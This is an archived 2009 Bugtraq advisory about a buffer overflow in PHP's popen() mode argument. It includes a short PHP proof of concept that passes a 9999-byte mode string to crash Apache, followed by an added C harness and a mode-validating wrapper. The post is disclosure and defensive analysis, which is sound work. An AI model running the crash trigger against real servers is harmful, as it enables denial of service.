Message-ID: <20090112133637.24790.qmail@securityfocus.com>
Date: 12 Jan 2009 13:36:37 -0000
From: ew1zz@...mail.com
To: bugtraq@...urityfocus.com
Subject: PHP Buffer Overflow(popen)

Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen function)

Type: Remote and Local

Requirements for exploit: popen() enabled (i.e. not listed in disable_functions).


By: e.wiZz!  Enes Mušić   ew1zz@...mail.com


PHP popen() function overview:

popen() in PHP opens a pipe to a process executed by forking the command given by $command.
It has been available since PHP 4.
     popen ( string $command_to_execute , string $mode )

The second argument ($mode) is vulnerable to a buffer overflow. Apache is mentioned here because
when poc.php is executed, the Apache HTTP server crashes without writing anything to the error log. You can test this on WAMP too, from the CLI or from a browser.


Tested on: PHP 5.2.8/4.2.1/4.2.0
           Apache 2.2.11


PoC:


<?php
// Oversized mode string: 9999 bytes where popen() expects "r" or "w".
$____buff = str_repeat("A", 9999);
// The command itself does not matter; per the write-up it is the mode
// argument that triggers the crash.
$handle = popen('/whatever/', $____buff);
echo $handle;
?>
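The following C harness is an added example, not part of the original post: it feeds the PoC's mode argument (9999 'A's) straight to the C library's popen() and shows the validation a wrapper should apply before handing a caller-controlled mode string down. It assumes a POSIX libc (glibc or musl; both reject a mode containing unknown characters with EINVAL before forking). The functions make_mode, popen_mode_is_valid, raw_popen_accepts, checked_popen and poc_mode_is_refused are this example's own names, and `true` is used as a harmless command.

```c
/* Added example: probe the libc popen() mode argument the way the PoC
 * above abuses it, and show a validating wrapper. Assumes a POSIX libc. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Build a mode string of `len` copies of `c`, like str_repeat("A", 9999).
 * Caller frees the result. */
char *make_mode(char c, size_t len)
{
    char *m = malloc(len + 1);
    if (!m)
        return NULL;
    memset(m, c, len);
    m[len] = '\0';
    return m;
}

/* Validation a popen() wrapper should do before passing the mode on:
 * accept "r" or "w", optionally followed by a single 'b'; reject anything
 * else, including an oversized string. Returns 1 if the mode is acceptable. */
int popen_mode_is_valid(const char *mode)
{
    if (mode == NULL)
        return 0;
    size_t n = strlen(mode);
    if (n < 1 || n > 2)
        return 0;
    if (mode[0] != 'r' && mode[0] != 'w')
        return 0;
    if (n == 2 && mode[1] != 'b')
        return 0;
    return 1;
}

/* Hand a mode string to the raw libc popen() and report what it did:
 * returns 1 if popen() accepted it, 0 if it returned NULL; errno is
 * stored in *err. For the PoC's all-'A' mode glibc and musl return NULL
 * with EINVAL without forking anything. */
int raw_popen_accepts(const char *mode, int *err)
{
    errno = 0;
    FILE *fp = popen("true", mode);
    *err = errno;
    if (fp == NULL)
        return 0;
    pclose(fp);
    return 1;
}

/* Hardened form of the call the PoC makes: validate, then delegate. */
FILE *checked_popen(const char *command, const char *mode)
{
    if (!popen_mode_is_valid(mode)) {
        errno = EINVAL;
        return NULL;
    }
    return popen(command, mode);
}

/* Run the PoC's exact argument (9999 'A's) through both the raw popen()
 * and the checked wrapper. Returns 1 if both refused it with EINVAL. */
int poc_mode_is_refused(void)
{
    char *m = make_mode('A', 9999);
    if (!m)
        return 0;
    int err = 0;
    int raw_accepted = raw_popen_accepts(m, &err);
    int raw_refused = (raw_accepted == 0 && err == EINVAL);
    errno = 0;
    FILE *fp = checked_popen("true", m);
    int checked_refused = (fp == NULL && errno == EINVAL);
    if (fp)
        pclose(fp);
    free(m);
    return raw_refused && checked_refused;
}

int main(void)
{
    int err = 0;
    char *poc_mode = make_mode('A', 9999); /* the PoC's mode string */
    int accepted = raw_popen_accepts(poc_mode, &err);
    printf("raw popen(): %s (errno=%d %s)\n",
           accepted ? "accepted" : "rejected", err, strerror(err));
    printf("checked_popen(): %s\n",
           checked_popen("true", poc_mode) ? "accepted" : "rejected");
    printf("PoC mode refused by both: %d\n", poc_mode_is_refused());
    free(poc_mode);
    return 0;
}
```

On glibc and musl the raw call returns NULL with EINVAL, so a crash reproduced through PHP on such a system is not coming from libc's popen() itself but from a layer above it; the WAMP/Windows path the write-up also mentions goes through PHP's own Windows popen implementation and the MSVC runtime, which this harness does not exercise. Note that libc does not bound the length at all: a mode made of 9999 'r' characters is accepted, so it is the unknown characters, not the length, that libc rejects. A wrapper that wants a length bound has to impose it itself, as popen_mode_is_valid does.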
